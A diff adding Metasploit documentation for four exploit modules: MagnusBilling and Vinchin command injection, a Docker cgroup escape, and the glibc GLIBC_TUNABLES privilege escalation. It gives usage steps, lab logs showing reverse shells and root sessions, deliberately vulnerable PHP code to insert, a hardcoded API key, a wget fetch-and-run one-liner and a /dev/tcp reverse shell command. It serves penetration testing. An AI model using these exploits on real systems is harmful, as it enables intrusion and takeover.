@@ -0,0 +1,241 @@
|
||||
## Vulnerable Application
|
||||
`MagnusBilling` is an open source tool written in `PHP` and `JAVASCRIPT`, aimed at IP telephony providers.
|
||||
It provides a complete and powerful system for anyone to start an IP telephony provider.
|
||||
Unfortunately a command injection vulnerability exists in `MagnusBilling` versions 6 and 7.
|
||||
The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.
|
||||
This is caused by a piece of demonstration code which is present in `lib/icepay/icepay.php`, with a call to `exec()` at line 753.
|
||||
The parameter to `exec()` includes the `GET` parameter `democ`, which is controlled by the user.
|
||||
|
||||
An unauthenticated user is able to execute arbitrary OS commands.
|
||||
The commands run with the privileges of the web server process, typically `www-data` or `asterisk`.
|
||||
At a minimum, this allows an attacker to compromise the billing system and its database.
|
||||
|
||||
See this [attackerkb article](https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258) for more information.
|
||||
|
||||
## Installation
|
||||
This module has been tested on:
|
||||
- Debian 12.2 running on VirtualBox 7 with MagnusBilling 7 installed.
|
||||
- CentOS 7 running on VirtualBox 7 with MagnusBilling 6 installed.
|
||||
|
||||
### Installation steps
|
||||
* Install Debian 11 or later on VirtualBox.
|
||||
* Follow these [instructions](https://linux.how2shout.com/install-debian-11-bullseye-on-virtualbox/).
|
||||
* Login into Debian Linux machine.
|
||||
* Switch to root with `su -` if needed.
|
||||
* Follow the install instructions for either [MagnusBilling 7](https://github.com/magnussolution/magnusbilling7) or
|
||||
[MagnusBilling 6](https://github.com/magnussolution/magnusbilling6)
|
||||
* After successful installation, you can test the module with the verification steps listed at the **Verification** section.
|
||||
|
||||
PS: If you have installed MagnusBilling 7, please update the `mbilling/lib/icepay/icepay.php` file at the web server root,
|
||||
typically `/var/www/html`, by adding the vulnerable code below.
|
||||
```php
|
||||
if (isset($_GET['demo'])) {
|
||||
|
||||
if ($_GET['demo'] == 1) {
|
||||
exec("touch idepay_proccess.php");
|
||||
} else {
|
||||
exec("rm -rf idepay_proccess.php");
|
||||
}
|
||||
}
|
||||
if (isset($_GET['democ'])) {
|
||||
if (strlen($_GET['democ']) > 5) {
|
||||
exec("touch " . $_GET['democ'] . '.txt');
|
||||
} else {
|
||||
exec("rm -rf *.txt");
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
- [x] Start `msfconsole`
|
||||
- [x] `use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258`
|
||||
- [x] `set rhosts <ip-target>`
|
||||
- [x] `set rport <port>`
|
||||
- [x] `set lhost <ip-attacker>`
|
||||
- [x] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
|
||||
- [x] `exploit`
|
||||
|
||||
you should get a `shell` or `Meterpreter` session.
|
||||
```shell
|
||||
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > info
|
||||
|
||||
Name: MagnusBilling application unauthenticated Remote Command Execution.
|
||||
Module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
|
||||
Platform: PHP, Unix, Linux
|
||||
Arch: php, cmd, x64, x86
|
||||
Privileged: Yes
|
||||
License: Metasploit Framework License (BSD)
|
||||
Rank: Excellent
|
||||
Disclosed: 2023-06-26
|
||||
|
||||
Provided by:
|
||||
h00die-gr3y <h00die.gr3y@gmail.com>
|
||||
Eldstal
|
||||
|
||||
Module side effects:
|
||||
ioc-in-logs
|
||||
artifacts-on-disk
|
||||
|
||||
Module stability:
|
||||
crash-safe
|
||||
|
||||
Module reliability:
|
||||
repeatable-session
|
||||
|
||||
Available targets:
|
||||
Id Name
|
||||
-- ----
|
||||
=> 0 PHP
|
||||
1 Unix Command
|
||||
2 Linux Dropper
|
||||
|
||||
Check supported:
|
||||
Yes
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
|
||||
/using-metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
TARGETURI /mbilling yes The MagnusBilling endpoint URL
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local ma
|
||||
chine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
|
||||
|
||||
When TARGET is 0:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
WEBSHELL no The name of the webshell with extension. Webshell name will be randomly generated if left
|
||||
unset.
|
||||
|
||||
Payload information:
|
||||
|
||||
Description:
|
||||
A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
|
||||
remote attackers to run arbitrary commands via unauthenticated HTTP request.
|
||||
A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
|
||||
The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
|
||||
not properly sanitised/escaped.
|
||||
After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
|
||||
The commands run with the privileges of the web server process, typically `www-data`.
|
||||
At a minimum, this allows an attacker to compromise the billing system and its database.
|
||||
|
||||
The following MagnusBilling applications are vulnerable:
|
||||
- MagnusBilling application version 6 (all versions);
|
||||
- MagnusBilling application up to version 7.x and including commit 7af21ed620;
|
||||
|
||||
References:
|
||||
https://nvd.nist.gov/vuln/detail/CVE-2023-30258
|
||||
https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258
|
||||
https://eldstal.se/advisories/230327-magnusbilling.html
|
||||
|
||||
|
||||
View the full module info with the info -d command.
|
||||
```
|
||||
|
||||
## Options
|
||||
### TARGETURI
|
||||
The uripath to the `MagnusBilling` web application. Default set is to `/mbilling`.
|
||||
### WEBSHELL
|
||||
You can use this option to set the filename and extension (should be .php) of the webshell.
|
||||
This is handy if you want to test the webshell upload and execution with different file names.
|
||||
to bypass any security settings on the Web and PHP server.
|
||||
|
||||
## Scenarios
|
||||
### MagnusBilling 7 on Debian 12.2 - PHP with payload php/meterpreter/reverse_tcp
|
||||
```shell
|
||||
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set rhosts 192.168.201.34
|
||||
rhosts => 192.168.201.34
|
||||
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.201.8:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 192.168.201.34:80 can be exploited.
|
||||
[*] Performing command injection test issuing a sleep command of 5 seconds.
|
||||
[*] Elapsed time: 5.1 seconds.
|
||||
[+] The target is vulnerable. Successfully tested command injection.
|
||||
[*] Executing PHP for php/meterpreter/reverse_tcp
|
||||
[*] Sending stage (39927 bytes) to 192.168.201.34
|
||||
[+] Deleted LfsCVIttNL.php
|
||||
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.34:46230) at 2023-10-24 10:26:47 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: asterisk
|
||||
meterpreter > sysinfo
|
||||
Computer : debian
|
||||
OS : Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64
|
||||
Meterpreter : php/linux
|
||||
meterpreter >
|
||||
```
|
||||
### MagnusBilling 7 on Debian 12.2 - Unix Command with payload cmd/unix/reverse_bash
|
||||
```shell
|
||||
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 1
|
||||
target => 1
|
||||
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.201.8:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 192.168.201.34:80 can be exploited.
|
||||
[*] Performing command injection test issuing a sleep command of 2 seconds.
|
||||
[*] Elapsed time: 2.1 seconds.
|
||||
[+] The target is vulnerable. Successfully tested command injection.
|
||||
[*] Executing Unix Command for cmd/unix/reverse_bash
|
||||
[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.34:46396) at 2023-10-24 17:09:45 +0000
|
||||
|
||||
uname -a
|
||||
Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64 GNU/Linux
|
||||
id
|
||||
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
|
||||
pwd
|
||||
/var/www/html/mbilling/lib/icepay
|
||||
```
|
||||
### MagnusBilling 7 on Debian 12.2 - Linux Dropper with payload linux/x64/meterpreter/reverse_tcp
|
||||
```shell
|
||||
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 2
|
||||
target => 2
|
||||
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.201.8:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 192.168.201.34:80 can be exploited.
|
||||
[*] Performing command injection test issuing a sleep command of 4 seconds.
|
||||
[*] Elapsed time: 4.09 seconds.
|
||||
[+] The target is vulnerable. Successfully tested command injection.
|
||||
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
|
||||
[*] Using URL: http://192.168.201.8:8080/3X16QTzG27N
|
||||
[*] Client 192.168.201.34 (Wget/1.21.3) requested /3X16QTzG27N
|
||||
[*] Sending payload to 192.168.201.34 (Wget/1.21.3)
|
||||
[*] Sending stage (3045380 bytes) to 192.168.201.34
|
||||
[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.34:55224) at 2023-10-24 17:12:05 +0000
|
||||
[*] Command Stager progress - 100.00% done (117/117 bytes)
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.201.34
|
||||
OS : Debian 12.2 (Linux 6.1.0-13-amd64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > getuid
|
||||
Server username: asterisk
|
||||
meterpreter > pwd
|
||||
/var/www/html/mbilling/lib/icepay
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
## Limitations
|
||||
No limitations identified.
|
||||
@@ -0,0 +1,170 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a vulnerability in Vinchin Backup & Recovery versions 5.0.x, 6.0.x, 6.7.x, and 7.0.x. To prepare the environment:
|
||||
|
||||
1. Download Vinchin Backup & Recovery version 5.0.x, 6.0.x, 6.7.x, or 7.0.x.
|
||||
2. Install the software on a Linux-based server using the downloaded ISO.
|
||||
3. During the installation, ensure that the network interface is active and configured.
|
||||
4. After installation, verify that the Vinchin Backup & Recovery service is operational and accessible over the network.
|
||||
|
||||
*Note: The module is designed to work with the specified versions. Functionality with other versions has not been confirmed.*
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install a vulnerable version of Vinchin Backup & Recovery (versions 5.0.x, 6.0.x, 6.7.x, or 7.0.x).
|
||||
2. Start msfconsole in your Metasploit environment.
|
||||
3. Do: `use exploit/linux/http/vinchin_backup_recovery_cmd_inject`
|
||||
4. Set the RHOSTS to the target IP address or hostname.
|
||||
5. Do: `run`
|
||||
6. If the target is vulnerable, the exploit will execute the specified payload or command.
|
||||
|
||||
## Options
|
||||
|
||||
Here are the specific options for the `exploit/linux/http/vinchin_backup_recovery_cmd_inject` module:
|
||||
|
||||
#### RHOSTS
|
||||
|
||||
- **Description**: Specifies the target address or range of addresses.
|
||||
- **Default Value**: None. It must be set by the user.
|
||||
|
||||
#### RPORT
|
||||
|
||||
- **Description**: The port on which the Vinchin Backup & Recovery service is running.
|
||||
- **Default Value**: 443 (this is not configurable in the default Vinchin Backup & Recovery setup).
|
||||
|
||||
#### SSL
|
||||
|
||||
- **Description**: Specifies whether to use SSL for the connection.
|
||||
- **Default Value**: True, as Vinchin typically runs over HTTPS.
|
||||
|
||||
#### TARGETURI
|
||||
|
||||
- **Description**: The base path to the Vinchin Backup & Recovery application.
|
||||
- **Default Value**: `/`
|
||||
|
||||
#### APIKEY
|
||||
|
||||
- **Description**: The hardcoded API key required to authenticate to the API.
|
||||
- **Default Value**: `6e24cc40bfdb6963c04a4f1983c8af71`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Successful Exploitation against Vinchin Backup & Recovery 7.0.1.26282
|
||||
|
||||
This scenario demonstrates exploiting the Vinchin Backup & Recovery version 7.0.1.26282 on a Linux server.
|
||||
|
||||
**Environment**:
|
||||
- Vinchin Backup & Recovery 7.0.1.26282
|
||||
- Linux Server
|
||||
- Metasploit Framework
|
||||
|
||||
**Steps**:
|
||||
|
||||
1. Start `msfconsole`.
|
||||
2. Load the exploit module:
|
||||
```
|
||||
use exploit/linux/http/vinchin_backup_recovery_cmd_inject
|
||||
```
|
||||
4. Set the required options:
|
||||
```
|
||||
set RHOSTS [target IP]
|
||||
set APIKEY [API Key]
|
||||
```
|
||||
5. Optionally set a payload and configure LHOST and LPORT.
|
||||
6. Execute the exploit:
|
||||
```
|
||||
exploit
|
||||
```
|
||||
|
||||
**Expected Output**:
|
||||
|
||||
```
|
||||
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > options
|
||||
|
||||
Module options (exploit/linux/http/vinchin_backup_recovery_cmd_inject):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
APIKEY 6e24cc40bfdb6963c04a4f1983c8 yes The hardcoded API key
|
||||
af71
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:
|
||||
port][...]
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.co
|
||||
m/docs/using-metasploit/basics/using-metasploit.ht
|
||||
ml
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is rando
|
||||
mly generated)
|
||||
TARGETURI / yes The base path to the Vinchin Backup & Recovery app
|
||||
lication
|
||||
URIPATH no The URI to use for this exploit (default is random
|
||||
)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an
|
||||
address on the local machine or 0.0.0.0 to listen on all address
|
||||
es.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FT
|
||||
P, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILENAME JSSwiKfcOw no Name to use on remote system when storing pa
|
||||
yload; cannot contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
FETCH_WRITABLE_DIR /usr/share/nginx/vinchin/ yes Remote writable dir to store payload; cannot
|
||||
tmp contain spaces.
|
||||
LHOST 192.168.1.5 yes The listen address (an interface may be spec
|
||||
ified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set rhosts 192.168.1.3
|
||||
rhosts => 192.168.1.3
|
||||
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > check
|
||||
|
||||
[*] Detected Vinchin version: 7.0.1.26282
|
||||
[+] 192.168.1.3:443 - The target is vulnerable.
|
||||
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.5:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Detected Vinchin version: 7.0.1.26282
|
||||
[+] The target is vulnerable.
|
||||
[*] Sending stage (3045380 bytes) to 192.168.1.3
|
||||
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.3:58960) at 2023-11-21 02:00:57 +0100
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : localhost.localdomain
|
||||
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
|
||||
```
|
||||
|
||||
Note: All instances of this exploit can be subject to privilege escalation using the
|
||||
`exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec` module in the Metasploit environment.
|
||||
@@ -0,0 +1,139 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
|
||||
If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.
|
||||
|
||||
A vulnerability was found in the Linux kernel's `cgroup_release_agent_write` in the `kernel/cgroup/cgroup-v1.c` function.
|
||||
This flaw, under certain circumstances, allows the use of the cgroups v1 `release_agent` feature to escalate privileges
|
||||
and bypass the namespace isolation unexpectedly.
|
||||
|
||||
More simply put, cgroups v1 has a feature called `release_agent` that runs a program when a process in the cgroup terminates.
|
||||
If `notify_on_release` is enabled, the kernel runs the `release_agent` binary as root. By editing the release_agent file,
|
||||
an attacker can execute their own binary with elevated privileges, taking control of the system. However, the `release_agent`
|
||||
file is owned by root, so only a user with root access can modify it.
|
||||
|
||||
### Docker Setup
|
||||
|
||||
`sudo docker run --rm -it --privileged ubuntu:20.04 bash`
|
||||
|
||||
or
|
||||
|
||||
`sudo docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu:20.04 bash`
|
||||
|
||||
You may want to install `wget` to make initial exploitation easier as well:
|
||||
|
||||
```
|
||||
apt-get update
|
||||
apt-get install -y wget
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install Docker and start a docker container
|
||||
2. Start msfconsole
|
||||
3. Get a shell on the docker image as root.
|
||||
4. Do: `use exploit/linux/local/docker_cgroup_escape`
|
||||
5. Do: `set lhost [ip]`
|
||||
6. Do: `set session [#]`
|
||||
7. Do: `run`
|
||||
8. You should get a root shell on the host OS.
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 18.04 LTS with 4.15.0-96-generic kernel and Docker Ubuntu 20.04
|
||||
|
||||
Initial Access
|
||||
|
||||
```
|
||||
resource (docker.rb)> use exploit/multi/script/web_delivery
|
||||
[*] Using configured payload python/meterpreter/reverse_tcp
|
||||
resource (docker.rb)> set lhost 1.1.1.1
|
||||
lhost => 1.1.1.1
|
||||
resource (docker.rb)> set srvport 8181
|
||||
srvport => 8181
|
||||
resource (docker.rb)> set target 7
|
||||
target => 7
|
||||
resource (docker.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
|
||||
payload => linux/x64/meterpreter/reverse_tcp
|
||||
resource (docker.rb)> run
|
||||
[*] Exploit running as background job 0.
|
||||
[*] Exploit completed, but no session was created.
|
||||
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||
[*] Using URL: http://1.1.1.1:8181/QZWpVr8t
|
||||
[*] Server started.
|
||||
[*] Run the following command on the target machine:
|
||||
wget -qO dLFtachL --no-check-certificate http://1.1.1.1:8181/QZWpVr8t; chmod +x dLFtachL; ./dLFtachL& disown
|
||||
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
|
||||
[*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes)
|
||||
[*] Sending stage (3045380 bytes) to 2.2.2.2
|
||||
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60288) at 2023-11-28 13:38:39 -0500
|
||||
|
||||
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
(Meterpreter 1)(/) > getuid
|
||||
Server username: root
|
||||
(Meterpreter 1)(/) > sysinfo
|
||||
Computer : 172.17.0.2
|
||||
OS : Ubuntu 20.04 (Linux 4.15.0-96-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
```
|
||||
|
||||
Exploit the Docker Escape
|
||||
|
||||
```
|
||||
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/docker_cgroup_escape
|
||||
[*] Using configured payload cmd/unix/reverse_bash
|
||||
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lhost 1.1.1.1
|
||||
lhost => 1.1.1.1
|
||||
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lport 9988
|
||||
lport => 9988
|
||||
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set verbose true
|
||||
verbose => true
|
||||
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set session 1
|
||||
session => 1
|
||||
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > run
|
||||
|
||||
[+] bash -c '0<&181-;exec 181<>/dev/tcp/1.1.1.1/9988;sh <&181 >&181 2>&181'
|
||||
[*] Started reverse TCP handler on 1.1.1.1:9988
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Unable to determine host OS, this check method is unlikely to be accurate if the host isn't Ubuntu
|
||||
[+] The target is vulnerable. IF host OS is Ubuntu, kernel version 4.15.0-96-generic is vulnerable
|
||||
[*] Creating folder for mount: /tmp/eH7EY
|
||||
[*] Creating directory /tmp/eH7EY
|
||||
[*] /tmp/eH7EY created
|
||||
[*] Mounting cgroup
|
||||
[*] Creating folder in cgroup for exploitation: /tmp/eH7EY/qe0oj7G
|
||||
[*] Creating directory /tmp/eH7EY/qe0oj7G
|
||||
[*] /tmp/eH7EY/qe0oj7G created
|
||||
[*] Enabling notify on release for group qe0oj7G
|
||||
[*] Determining the host OS path for image
|
||||
[*] Host OS path for image: /var/lib/docker/overlay2/c8b82079007d1f6dcf042787cd450ffe045595be11c29ca5b119d1802cfaa22f/diff
|
||||
[*] Setting release_agent path to: /var/lib/docker/overlay2/c8b82079007d1f6dcf042787cd450ffe045595be11c29ca5b119d1802cfaa22f/diff/tmp/KksBaCbF
|
||||
[*] Uploading payload to /tmp/KksBaCbF
|
||||
[*] Writing '/tmp/KksBaCbF' (88 bytes) ...
|
||||
[*] Triggering payload with command: sh -c "echo $$ > /tmp/eH7EY/qe0oj7G/cgroup.procs"
|
||||
[*] Command shell session 2 opened (1.1.1.1:9988 -> 2.2.2.2:54990) at 2023-11-28 14:39:10 -0500
|
||||
[*] Cleanup: Unmounting /tmp/eH7EY
|
||||
|
||||
FDjfSpoVnqvGmrtBOSRfABBgFMmcSkbT
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
cat /etc/os-release
|
||||
NAME="Ubuntu"
|
||||
VERSION="18.04 LTS (Bionic Beaver)"
|
||||
ID=ubuntu
|
||||
ID_LIKE=debian
|
||||
PRETTY_NAME="Ubuntu 18.04 LTS"
|
||||
VERSION_ID="18.04"
|
||||
HOME_URL="https://www.ubuntu.com/"
|
||||
SUPPORT_URL="https://help.ubuntu.com/"
|
||||
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
|
||||
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
|
||||
VERSION_CODENAME=bionic
|
||||
UBUNTU_CODENAME=bionic
|
||||
```
|
||||
@@ -0,0 +1,169 @@
|
||||
## Vulnerable Application
|
||||
|
||||
A buffer overflow was exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment
|
||||
variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when
|
||||
launching binaries with SUID permission to execute code in the context of the root user.
|
||||
|
||||
This module targets glibc packaged on Ubuntu and Debian. The specific versions this module targets are:
|
||||
|
||||
Ubuntu:
|
||||
2.35-0ubuntu3.4 > 2.35
|
||||
2.37-0ubuntu2.1 > 2.37
|
||||
2.38-1ubuntu6 > 2.38
|
||||
|
||||
Debian:
|
||||
2.31-13-deb11u7 > 2.31
|
||||
2.36-9-deb12u3 > 2.36
|
||||
|
||||
Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911
|
||||
however this module does not target them.
|
||||
|
||||
### Description
|
||||
|
||||
The GLIBC_TUNABLES environment variable is parsed in a loop and is expected to be provided in the following format:
|
||||
`tunable1=aaa:tunable2=bbb`. If the variable is sent in the following format: `tunable1=tunable2=AAA` due to the
|
||||
absence of the tunable delimiter `:` in the string, the value `tunable2=AAA` is handled incorrectly and results in a
|
||||
buffer overflow.
|
||||
|
||||
### Setup
|
||||
|
||||
Install [Ubuntu 22.04.3](https://releases.ubuntu.com/jammy/ubuntu-22.04.3-desktop-amd64.iso) while ensuring the VM does
|
||||
not have internet access.
|
||||
|
||||
Once booted up, edit `/etc/apt/apt.conf.d/20auto-upgrades` and change `APT::Periodic::Unattended-Upgrade` from `1` to
|
||||
`0` to ensure to ensure the machine doesn't patch itself.
|
||||
|
||||
Ensure that glibc is at version 2.35-0ubuntu3.1 by running the following:
|
||||
```
|
||||
msfuser@msfuser-virtual-machine:~$ ldd --version
|
||||
ldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35
|
||||
Copyright (C) 2022 Free Software Foundation, Inc.
|
||||
This is free software; see the source for copying conditions. There is NO
|
||||
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
Written by Roland McGrath and Ulrich Drepper.
|
||||
```
|
||||
The target should be exploitable.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Get a session
|
||||
3. Do: `use exploit/linux/local/glibc_tunables_priv_esc`
|
||||
4. Do: `set SESSION [SESSION]`
|
||||
5. Do: `check`
|
||||
6. Do: `run`
|
||||
7. You should get a new *root* session
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 22.04.3 with 2.35-0ubuntu3.1 installed (ARCH_X64)
|
||||
```
|
||||
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
|
||||
payload => linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set session -1
|
||||
session => -1
|
||||
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lhost 192.168.123.1
|
||||
lhost => 192.168.123.1
|
||||
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lport 5555
|
||||
lport => 5555
|
||||
msf6 exploit(linux/local/glibc_tunables_priv_esc) > options
|
||||
|
||||
Module options (exploit/linux/local/glibc_tunables_priv_esc):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
|
||||
SESSION -1 yes The session to run this module on
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.123.1 yes The listen address (an interface may be specified)
|
||||
LPORT 5555 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Auto
|
||||
|
||||
msf6 exploit(linux/local/glibc_tunables_priv_esc) > run
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.123.1:5555
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable
|
||||
[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit.
|
||||
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
|
||||
[*] Sending stage (3045380 bytes) to 192.168.123.228
|
||||
[*] Meterpreter session 5 opened (192.168.123.1:5555 -> 192.168.123.228:33016) at 2023-12-19 10:53:09 -0500
|
||||
|
||||
meterpreter >getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.123.228
|
||||
OS : Ubuntu 22.04 (Linux 6.2.0-35-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
|
||||
```
|
||||
|
||||
### Debian 12 with 2.36-9-deb12u1 installed (ARCH_X64)
|
||||
```
|
||||
msf6 exploit(linux/local/glibc_tunables_priv_esc) > options
|
||||
|
||||
Module options (exploit/linux/local/glibc_tunables_priv_esc):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION -1 yes The session to run this module on
|
||||
|
